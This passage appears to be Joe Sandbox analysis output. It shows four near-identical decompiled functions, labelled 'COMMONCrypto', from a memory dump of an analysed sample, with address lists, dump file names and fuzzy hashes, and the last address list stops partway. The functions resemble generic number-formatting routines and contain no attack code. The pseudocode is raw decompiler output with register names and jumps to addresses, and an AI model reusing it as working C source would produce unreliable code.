COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E00007FF77FF7DA8E0F04(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				signed long long _v24;
				signed int _t83;
				void* _t98;
				intOrPtr _t99;
				signed int _t106;
				void* _t114;
				intOrPtr _t118;
				void* _t123;
				intOrPtr* _t126;
				intOrPtr _t127;
				char* _t128;
				intOrPtr* _t129;
				void* _t133;
				intOrPtr _t144;
				void* _t148;
				void* _t151;
				void* _t153;
				void* _t154;

				_t114 = _t148;
				 *((long long*)(_t114 + 8)) = __rbx;
				 *((long long*)(_t114 + 0x10)) = __rbp;
				 *((long long*)(_t114 + 0x18)) = __rsi;
				 *((long long*)(_t114 + 0x20)) = __rdi;
				_push(_t154);
				r8d =  *((intOrPtr*)(__rcx + 0x34));
				bpl = __edx;
				_t123 = __rcx;
				r14d = 8;
				_t98 = r8d - 5;
				if (_t98 > 0) goto 0xda8e1000;
				if (_t98 == 0) goto 0xda8e0f66;
				_t99 = r8d;
				if (_t99 == 0) goto 0xda8e1057;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e0fd7;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e0faf;
				r8d = r8d - 1;
				if (_t99 == 0) goto 0xda8e1057;
				if (r8d != 1) goto 0xda8e1023;
				_t83 =  *(__rcx + 0x28);
				_t126 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xda8e0f99;
				if ( *_t126 >= 0) goto 0xda8e0f99;
				 *(__rcx + 0x28) = _t83 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xda8e1083;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0xda8e109a;
				_t127 =  *((intOrPtr*)(_t126 + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
				if (( *(_t126 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xda8e0fd2;
				goto 0xda8e0f82;
				goto 0xda8e0f82;
				_t128 =  *((intOrPtr*)(_t127 + 0x18));
				_t106 = dil &  *(_t127 + 0x28) >> 0x00000004;
				 *((long long*)(__rcx + 0x18)) = _t128 + 8;
				if (_t106 == 0) goto 0xda8e0ffb;
				goto 0xda8e0f82;
				goto 0xda8e0f82;
				r8d = r8d - 6;
				if (_t106 == 0) goto 0xda8e0f66;
				r8d = r8d - 1;
				if (_t106 == 0) goto 0xda8e0f66;
				r8d = r8d - 2;
				if (_t106 == 0) goto 0xda8e0f66;
				goto 0xda8e0f52;
				_t118 =  *((intOrPtr*)(_t128 + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t118 + 0x30)) = 1;
				 *((intOrPtr*)(_t118 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(_t128 + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF7DA8E9C34( *((intOrPtr*)(_t128 + 8)), __rcx, _t128, _t133,  *_t128, __rbp, _t151);
				goto 0xda8e10f2;
				_t129 =  *((intOrPtr*)(_t128 + 0x18));
				 *((long long*)(_t123 + 0x18)) = _t129 + 8;
				if (0 == 0) goto 0xda8e107c;
				_t144 =  *_t129;
				goto 0xda8e0f82;
				goto 0xda8e0f82;
				 *(_t123 + 0x28) =  *(_t128 + 0x28) & 0xfffffff7;
				E00007FF77FF7DA8DFDD8(_t123, _t123 + 0x50,  *((intOrPtr*)(_t123 + 0x30)), _t144,  *((intOrPtr*)(_t123 + 8)));
				if (_t144 != 0) goto 0xda8e10a3;
				 *(_t123 + 0x28) =  *(_t123 + 0x28) & 0xffffffdf;
				 *((char*)(_t123 + 0x4c)) = 1;
				r8b = bpl;
				if (_t154 != _t154) goto 0xda8e10bc;
				E00007FF77FF7DA8E1A4C(_t123, _t123, _t144);
				goto 0xda8e10c3;
				E00007FF77FF7DA8E16C0( *_t129, _t123, _t123, _t144, _t153);
				if (0 == 0) goto 0xda8e10f0;
				if ( *((intOrPtr*)(_t123 + 0x48)) == 0) goto 0xda8e10e1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x40)))) == 0x30) goto 0xda8e10f0;
				 *((long long*)(_t123 + 0x40)) =  *((long long*)(_t123 + 0x40)) + 0xfffffffe;
				 *((short*)( *((intOrPtr*)(_t123 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t123 + 0x48)) =  *((intOrPtr*)(_t123 + 0x48)) + 1;
				return 1;
			}

0x7ff7da8e0f04
0x7ff7da8e0f07
0x7ff7da8e0f0b
0x7ff7da8e0f0f
0x7ff7da8e0f13
0x7ff7da8e0f17
0x7ff7da8e0f1d
0x7ff7da8e0f21
0x7ff7da8e0f24
0x7ff7da8e0f27
0x7ff7da8e0f2d
0x7ff7da8e0f31
0x7ff7da8e0f37
0x7ff7da8e0f39
0x7ff7da8e0f3c
0x7ff7da8e0f42
0x7ff7da8e0f46
0x7ff7da8e0f4c
0x7ff7da8e0f50
0x7ff7da8e0f52
0x7ff7da8e0f56
0x7ff7da8e0f60
0x7ff7da8e0f66
0x7ff7da8e0f6c
0x7ff7da8e0f7b
0x7ff7da8e0f89
0x7ff7da8e0f8e
0x7ff7da8e0f96
0x7ff7da8e0f9d
0x7ff7da8e0fa3
0x7ff7da8e0faa
0x7ff7da8e0fb7
0x7ff7da8e0fc6
0x7ff7da8e0fca
0x7ff7da8e0fd0
0x7ff7da8e0fd5
0x7ff7da8e0fdf
0x7ff7da8e0fe8
0x7ff7da8e0fef
0x7ff7da8e0ff3
0x7ff7da8e0ff9
0x7ff7da8e0ffe
0x7ff7da8e1000
0x7ff7da8e1004
0x7ff7da8e100a
0x7ff7da8e100e
0x7ff7da8e1014
0x7ff7da8e1018
0x7ff7da8e101e
0x7ff7da8e1023
0x7ff7da8e1027
0x7ff7da8e102a
0x7ff7da8e102f
0x7ff7da8e1033
0x7ff7da8e1040
0x7ff7da8e1045
0x7ff7da8e104b
0x7ff7da8e1052
0x7ff7da8e105f
0x7ff7da8e106e
0x7ff7da8e1072
0x7ff7da8e1074
0x7ff7da8e1077
0x7ff7da8e107e
0x7ff7da8e108e
0x7ff7da8e1095
0x7ff7da8e109d
0x7ff7da8e109f
0x7ff7da8e10a3
0x7ff7da8e10a7
0x7ff7da8e10b0
0x7ff7da8e10b5
0x7ff7da8e10ba
0x7ff7da8e10be
0x7ff7da8e10cb
0x7ff7da8e10d6
0x7ff7da8e10df
0x7ff7da8e10e1
0x7ff7da8e10ea
0x7ff7da8e10ed
0x7ff7da8e110c

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
Instruction ID: 5e04c7491b860030bcebb3af41c9e3ebf599290905275588710133e1b3a263ae
Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
Instruction Fuzzy Hash: AD518376A58691C5F7659B28C04022C63B0FB64B58FE44172CE4C177D6CB3FEA62C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E0D00 Relevance: .1, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00007FF77FF7DA8E0D00(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				signed long long _v24;
				signed int _t83;
				void* _t97;
				intOrPtr _t98;
				signed int _t105;
				void* _t113;
				intOrPtr _t117;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr _t126;
				char* _t127;
				intOrPtr* _t128;
				void* _t132;
				intOrPtr _t143;
				void* _t147;
				void* _t150;
				void* _t152;

				_t113 = _t147;
				 *((long long*)(_t113 + 8)) = __rbx;
				 *((long long*)(_t113 + 0x10)) = __rbp;
				 *((long long*)(_t113 + 0x18)) = __rsi;
				 *((long long*)(_t113 + 0x20)) = __rdi;
				_push(_t152);
				r8d =  *((intOrPtr*)(__rcx + 0x34));
				bpl = __edx;
				_t122 = __rcx;
				r14d = 8;
				_t97 = r8d - 5;
				if (_t97 > 0) goto 0xda8e0dfc;
				if (_t97 == 0) goto 0xda8e0d62;
				_t98 = r8d;
				if (_t98 == 0) goto 0xda8e0e53;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e0dd3;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e0dab;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e0e53;
				if (r8d != 1) goto 0xda8e0e1f;
				_t83 =  *(__rcx + 0x28);
				_t125 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t125 + 8;
				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xda8e0d95;
				if ( *_t125 >= 0) goto 0xda8e0d95;
				 *(__rcx + 0x28) = _t83 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xda8e0e7f;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0xda8e0e96;
				_t126 =  *((intOrPtr*)(_t125 + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
				if (( *(_t125 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xda8e0dce;
				goto 0xda8e0d7e;
				goto 0xda8e0d7e;
				_t127 =  *((intOrPtr*)(_t126 + 0x18));
				_t105 = dil &  *(_t126 + 0x28) >> 0x00000004;
				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
				if (_t105 == 0) goto 0xda8e0df7;
				goto 0xda8e0d7e;
				goto 0xda8e0d7e;
				r8d = r8d - 6;
				if (_t105 == 0) goto 0xda8e0d62;
				r8d = r8d - 1;
				if (_t105 == 0) goto 0xda8e0d62;
				r8d = r8d - 2;
				if (_t105 == 0) goto 0xda8e0d62;
				goto 0xda8e0d4e;
				_t117 =  *((intOrPtr*)(_t127 + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t117 + 0x30)) = 1;
				 *((intOrPtr*)(_t117 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(_t127 + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF7DA8E9C34( *((intOrPtr*)(_t127 + 8)), __rcx, _t127, _t132,  *_t127, __rbp, _t150);
				goto 0xda8e0ee8;
				_t128 =  *((intOrPtr*)(_t127 + 0x18));
				 *((long long*)(_t122 + 0x18)) = _t128 + 8;
				if (0 == 0) goto 0xda8e0e78;
				_t143 =  *_t128;
				goto 0xda8e0d7e;
				goto 0xda8e0d7e;
				 *(_t122 + 0x28) =  *(_t127 + 0x28) & 0xfffffff7;
				E00007FF77FF7DA8DFD30(_t122, _t122 + 0x50,  *((intOrPtr*)(_t122 + 0x30)), _t143,  *((intOrPtr*)(_t122 + 8)));
				if (_t143 != 0) goto 0xda8e0e9f;
				 *(_t122 + 0x28) =  *(_t122 + 0x28) & 0xffffffdf;
				 *((char*)(_t122 + 0x4c)) = 0;
				r8b = bpl;
				if (_t152 != _t152) goto 0xda8e0eb8;
				E00007FF77FF7DA8E199C(_t122, _t122, _t143);
				goto 0xda8e0ebf;
				E00007FF77FF7DA8E1614( *_t128, _t122, _t122, _t143);
				if (0 == 0) goto 0xda8e0ee6;
				if ( *((intOrPtr*)(_t122 + 0x48)) == 0) goto 0xda8e0ed8;
				if ( *((char*)( *((intOrPtr*)(_t122 + 0x40)))) == 0x30) goto 0xda8e0ee6;
				 *((long long*)(_t122 + 0x40)) =  *((long long*)(_t122 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t122 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t122 + 0x48)) =  *((intOrPtr*)(_t122 + 0x48)) + 1;
				return 1;
			}

0x7ff7da8e0d00
0x7ff7da8e0d03
0x7ff7da8e0d07
0x7ff7da8e0d0b
0x7ff7da8e0d0f
0x7ff7da8e0d13
0x7ff7da8e0d19
0x7ff7da8e0d1d
0x7ff7da8e0d20
0x7ff7da8e0d23
0x7ff7da8e0d29
0x7ff7da8e0d2d
0x7ff7da8e0d33
0x7ff7da8e0d35
0x7ff7da8e0d38
0x7ff7da8e0d3e
0x7ff7da8e0d42
0x7ff7da8e0d48
0x7ff7da8e0d4c
0x7ff7da8e0d4e
0x7ff7da8e0d52
0x7ff7da8e0d5c
0x7ff7da8e0d62
0x7ff7da8e0d68
0x7ff7da8e0d77
0x7ff7da8e0d85
0x7ff7da8e0d8a
0x7ff7da8e0d92
0x7ff7da8e0d99
0x7ff7da8e0d9f
0x7ff7da8e0da6
0x7ff7da8e0db3
0x7ff7da8e0dc2
0x7ff7da8e0dc6
0x7ff7da8e0dcc
0x7ff7da8e0dd1
0x7ff7da8e0ddb
0x7ff7da8e0de4
0x7ff7da8e0deb
0x7ff7da8e0def
0x7ff7da8e0df5
0x7ff7da8e0dfa
0x7ff7da8e0dfc
0x7ff7da8e0e00
0x7ff7da8e0e06
0x7ff7da8e0e0a
0x7ff7da8e0e10
0x7ff7da8e0e14
0x7ff7da8e0e1a
0x7ff7da8e0e1f
0x7ff7da8e0e23
0x7ff7da8e0e26
0x7ff7da8e0e2b
0x7ff7da8e0e2f
0x7ff7da8e0e3c
0x7ff7da8e0e41
0x7ff7da8e0e47
0x7ff7da8e0e4e
0x7ff7da8e0e5b
0x7ff7da8e0e6a
0x7ff7da8e0e6e
0x7ff7da8e0e70
0x7ff7da8e0e73
0x7ff7da8e0e7a
0x7ff7da8e0e8a
0x7ff7da8e0e91
0x7ff7da8e0e99
0x7ff7da8e0e9b
0x7ff7da8e0e9f
0x7ff7da8e0ea3
0x7ff7da8e0eac
0x7ff7da8e0eb1
0x7ff7da8e0eb6
0x7ff7da8e0eba
0x7ff7da8e0ec7
0x7ff7da8e0ecd
0x7ff7da8e0ed6
0x7ff7da8e0ed8
0x7ff7da8e0ee0
0x7ff7da8e0ee3
0x7ff7da8e0f02

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
Instruction ID: 41614fd290c6c542cdae1b11de86b0c94b50af06cf9b53695efb07908f6f0c7e
Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
Instruction Fuzzy Hash: 97518332A58692C5F7269B28D04022C67B0FB68B58FE44572CE4C5779ACB3FE962C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E08F0 Relevance: .1, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00007FF77FF7DA8E08F0(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				signed long long _v24;
				signed int _t83;
				void* _t97;
				intOrPtr _t98;
				signed int _t105;
				void* _t113;
				intOrPtr _t117;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr _t126;
				char* _t127;
				intOrPtr* _t128;
				void* _t132;
				intOrPtr _t143;
				void* _t147;
				void* _t150;
				void* _t152;

				_t113 = _t147;
				 *((long long*)(_t113 + 8)) = __rbx;
				 *((long long*)(_t113 + 0x10)) = __rbp;
				 *((long long*)(_t113 + 0x18)) = __rsi;
				 *((long long*)(_t113 + 0x20)) = __rdi;
				_push(_t152);
				r8d =  *((intOrPtr*)(__rcx + 0x34));
				bpl = __edx;
				_t122 = __rcx;
				r14d = 8;
				_t97 = r8d - 5;
				if (_t97 > 0) goto 0xda8e09ec;
				if (_t97 == 0) goto 0xda8e0952;
				_t98 = r8d;
				if (_t98 == 0) goto 0xda8e0a43;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e09c3;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e099b;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e0a43;
				if (r8d != 1) goto 0xda8e0a0f;
				_t83 =  *(__rcx + 0x28);
				_t125 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t125 + 8;
				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xda8e0985;
				if ( *_t125 >= 0) goto 0xda8e0985;
				 *(__rcx + 0x28) = _t83 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xda8e0a6f;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0xda8e0a86;
				_t126 =  *((intOrPtr*)(_t125 + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
				if (( *(_t125 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xda8e09be;
				goto 0xda8e096e;
				goto 0xda8e096e;
				_t127 =  *((intOrPtr*)(_t126 + 0x18));
				_t105 = dil &  *(_t126 + 0x28) >> 0x00000004;
				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
				if (_t105 == 0) goto 0xda8e09e7;
				goto 0xda8e096e;
				goto 0xda8e096e;
				r8d = r8d - 6;
				if (_t105 == 0) goto 0xda8e0952;
				r8d = r8d - 1;
				if (_t105 == 0) goto 0xda8e0952;
				r8d = r8d - 2;
				if (_t105 == 0) goto 0xda8e0952;
				goto 0xda8e093e;
				_t117 =  *((intOrPtr*)(_t127 + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t117 + 0x30)) = 1;
				 *((intOrPtr*)(_t117 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(_t127 + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF7DA8E9C34( *((intOrPtr*)(_t127 + 8)), __rcx, _t127, _t132,  *_t127, __rbp, _t150);
				goto 0xda8e0ad8;
				_t128 =  *((intOrPtr*)(_t127 + 0x18));
				 *((long long*)(_t122 + 0x18)) = _t128 + 8;
				if (0 == 0) goto 0xda8e0a68;
				_t143 =  *_t128;
				goto 0xda8e096e;
				goto 0xda8e096e;
				 *(_t122 + 0x28) =  *(_t127 + 0x28) & 0xfffffff7;
				E00007FF77FF7DA8DFD30(_t122, _t122 + 0x50,  *((intOrPtr*)(_t122 + 0x30)), _t143,  *((intOrPtr*)(_t122 + 8)));
				if (_t143 != 0) goto 0xda8e0a8f;
				 *(_t122 + 0x28) =  *(_t122 + 0x28) & 0xffffffdf;
				 *((char*)(_t122 + 0x4c)) = 0;
				r8b = bpl;
				if (_t152 != _t152) goto 0xda8e0aa8;
				E00007FF77FF7DA8E18A4( *(_t127 + 0x28) & 0xfffffff7, _t122, _t143);
				goto 0xda8e0aaf;
				E00007FF77FF7DA8E1520( *_t128, _t122);
				if (0 == 0) goto 0xda8e0ad6;
				if ( *((intOrPtr*)(_t122 + 0x48)) == 0) goto 0xda8e0ac8;
				if ( *((char*)( *((intOrPtr*)(_t122 + 0x40)))) == 0x30) goto 0xda8e0ad6;
				 *((long long*)(_t122 + 0x40)) =  *((long long*)(_t122 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t122 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t122 + 0x48)) =  *((intOrPtr*)(_t122 + 0x48)) + 1;
				return 1;
			}

0x7ff7da8e08f0
0x7ff7da8e08f3
0x7ff7da8e08f7
0x7ff7da8e08fb
0x7ff7da8e08ff
0x7ff7da8e0903
0x7ff7da8e0909
0x7ff7da8e090d
0x7ff7da8e0910
0x7ff7da8e0913
0x7ff7da8e0919
0x7ff7da8e091d
0x7ff7da8e0923
0x7ff7da8e0925
0x7ff7da8e0928
0x7ff7da8e092e
0x7ff7da8e0932
0x7ff7da8e0938
0x7ff7da8e093c
0x7ff7da8e093e
0x7ff7da8e0942
0x7ff7da8e094c
0x7ff7da8e0952
0x7ff7da8e0958
0x7ff7da8e0967
0x7ff7da8e0975
0x7ff7da8e097a
0x7ff7da8e0982
0x7ff7da8e0989
0x7ff7da8e098f
0x7ff7da8e0996
0x7ff7da8e09a3
0x7ff7da8e09b2
0x7ff7da8e09b6
0x7ff7da8e09bc
0x7ff7da8e09c1
0x7ff7da8e09cb
0x7ff7da8e09d4
0x7ff7da8e09db
0x7ff7da8e09df
0x7ff7da8e09e5
0x7ff7da8e09ea
0x7ff7da8e09ec
0x7ff7da8e09f0
0x7ff7da8e09f6
0x7ff7da8e09fa
0x7ff7da8e0a00
0x7ff7da8e0a04
0x7ff7da8e0a0a
0x7ff7da8e0a0f
0x7ff7da8e0a13
0x7ff7da8e0a16
0x7ff7da8e0a1b
0x7ff7da8e0a1f
0x7ff7da8e0a2c
0x7ff7da8e0a31
0x7ff7da8e0a37
0x7ff7da8e0a3e
0x7ff7da8e0a4b
0x7ff7da8e0a5a
0x7ff7da8e0a5e
0x7ff7da8e0a60
0x7ff7da8e0a63
0x7ff7da8e0a6a
0x7ff7da8e0a7a
0x7ff7da8e0a81
0x7ff7da8e0a89
0x7ff7da8e0a8b
0x7ff7da8e0a8f
0x7ff7da8e0a93
0x7ff7da8e0a9c
0x7ff7da8e0aa1
0x7ff7da8e0aa6
0x7ff7da8e0aaa
0x7ff7da8e0ab7
0x7ff7da8e0abd
0x7ff7da8e0ac6
0x7ff7da8e0ac8
0x7ff7da8e0ad0
0x7ff7da8e0ad3
0x7ff7da8e0af2

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
Instruction ID: a7f9282bea816b56951c2845ae2073e0c108bcbb667bb1334dbcf735ce86d3d3
Opcode Fuzzy Hash: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
Instruction Fuzzy Hash: 3C51B132A58695C5F726AF29D04022CA3B0FB65B58FA44472CE4C17796CB3FED62C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E1110 Relevance: .1, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00007FF77FF7DA8E1110(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				signed long long _v24;
				signed int _t83;
				void* _t97;
				intOrPtr _t98;
				signed int _t105;
				void* _t113;
				intOrPtr _t117;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr _t126;
				char* _t127;
				intOrPtr* _t128;
				void* _t132;
				intOrPtr _t143;
				void* _t147;
				void* _t150;
				void* _t152;

				_t113 = _t147;
				 *((long long*)(_t113 + 8)) = __rbx;
				 *((long long*)(_t113 + 0x10)) = __rbp;
				 *((long long*)(_t113 + 0x18)) = __rsi;
				 *((long long*)(_t113 + 0x20)) = __rdi;
				_push(_t152);
				r8d =  *((intOrPtr*)(__rcx + 0x34));
				bpl = __edx;
				_t122 = __rcx;
				r14d = 8;
				_t97 = r8d - 5;
				if (_t97 > 0) goto 0xda8e120c;
				if (_t97 == 0) goto 0xda8e1172;
				_t98 = r8d;
				if (_t98 == 0) goto 0xda8e1263;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e11e3;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e11bb;
				r8d = r8d - 1;
				if (_t98 == 0) goto 0xda8e1263;
				if (r8d != 1) goto 0xda8e122f;
				_t83 =  *(__rcx + 0x28);
				_t125 =  *((intOrPtr*)(__rcx + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t125 + 8;
				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xda8e11a5;
				if ( *_t125 >= 0) goto 0xda8e11a5;
				 *(__rcx + 0x28) = _t83 | 0x00000040;
				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xda8e128f;
				 *((intOrPtr*)(__rcx + 0x30)) = 1;
				goto 0xda8e12a6;
				_t126 =  *((intOrPtr*)(_t125 + 0x18));
				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
				if (( *(_t125 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xda8e11de;
				goto 0xda8e118e;
				goto 0xda8e118e;
				_t127 =  *((intOrPtr*)(_t126 + 0x18));
				_t105 = dil &  *(_t126 + 0x28) >> 0x00000004;
				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
				if (_t105 == 0) goto 0xda8e1207;
				goto 0xda8e118e;
				goto 0xda8e118e;
				r8d = r8d - 6;
				if (_t105 == 0) goto 0xda8e1172;
				r8d = r8d - 1;
				if (_t105 == 0) goto 0xda8e1172;
				r8d = r8d - 2;
				if (_t105 == 0) goto 0xda8e1172;
				goto 0xda8e115e;
				_t117 =  *((intOrPtr*)(_t127 + 8));
				r9d = 0;
				r8d = 0;
				 *((char*)(_t117 + 0x30)) = 1;
				 *((intOrPtr*)(_t117 + 0x2c)) = 0x16;
				_v16 =  *((intOrPtr*)(_t127 + 8));
				_v24 = _v24 & 0x00000000;
				E00007FF77FF7DA8E9C34( *((intOrPtr*)(_t127 + 8)), __rcx, _t127, _t132,  *_t127, __rbp, _t150);
				goto 0xda8e12f8;
				_t128 =  *((intOrPtr*)(_t127 + 0x18));
				 *((long long*)(_t122 + 0x18)) = _t128 + 8;
				if (0 == 0) goto 0xda8e1288;
				_t143 =  *_t128;
				goto 0xda8e118e;
				goto 0xda8e118e;
				 *(_t122 + 0x28) =  *(_t127 + 0x28) & 0xfffffff7;
				E00007FF77FF7DA8DFD30(_t122, _t122 + 0x50,  *((intOrPtr*)(_t122 + 0x30)), _t143,  *((intOrPtr*)(_t122 + 8)));
				if (_t143 != 0) goto 0xda8e12af;
				 *(_t122 + 0x28) =  *(_t122 + 0x28) & 0xffffffdf;
				 *((char*)(_t122 + 0x4c)) = 0;
				r8b = bpl;
				if (_t152 != _t152) goto 0xda8e12c8;
				E00007FF77FF7DA8E1B10( *(_t127 + 0x28) & 0xfffffff7, _t122, _t143);
				goto 0xda8e12cf;
				E00007FF77FF7DA8E1780( *_t128, _t122);
				if (0 == 0) goto 0xda8e12f6;
				if ( *((intOrPtr*)(_t122 + 0x48)) == 0) goto 0xda8e12e8;
				if ( *((char*)( *((intOrPtr*)(_t122 + 0x40)))) == 0x30) goto 0xda8e12f6;
				 *((long long*)(_t122 + 0x40)) =  *((long long*)(_t122 + 0x40)) - 1;
				 *((char*)( *((intOrPtr*)(_t122 + 0x40)))) = 0x30;
				 *((intOrPtr*)(_t122 + 0x48)) =  *((intOrPtr*)(_t122 + 0x48)) + 1;
				return 1;
			}

0x7ff7da8e1110
0x7ff7da8e1113
0x7ff7da8e1117
0x7ff7da8e111b
0x7ff7da8e111f
0x7ff7da8e1123
0x7ff7da8e1129
0x7ff7da8e112d
0x7ff7da8e1130
0x7ff7da8e1133
0x7ff7da8e1139
0x7ff7da8e113d
0x7ff7da8e1143
0x7ff7da8e1145
0x7ff7da8e1148
0x7ff7da8e114e
0x7ff7da8e1152
0x7ff7da8e1158
0x7ff7da8e115c
0x7ff7da8e115e
0x7ff7da8e1162
0x7ff7da8e116c
0x7ff7da8e1172
0x7ff7da8e1178
0x7ff7da8e1187
0x7ff7da8e1195
0x7ff7da8e119a
0x7ff7da8e11a2
0x7ff7da8e11a9
0x7ff7da8e11af
0x7ff7da8e11b6
0x7ff7da8e11c3
0x7ff7da8e11d2
0x7ff7da8e11d6
0x7ff7da8e11dc
0x7ff7da8e11e1
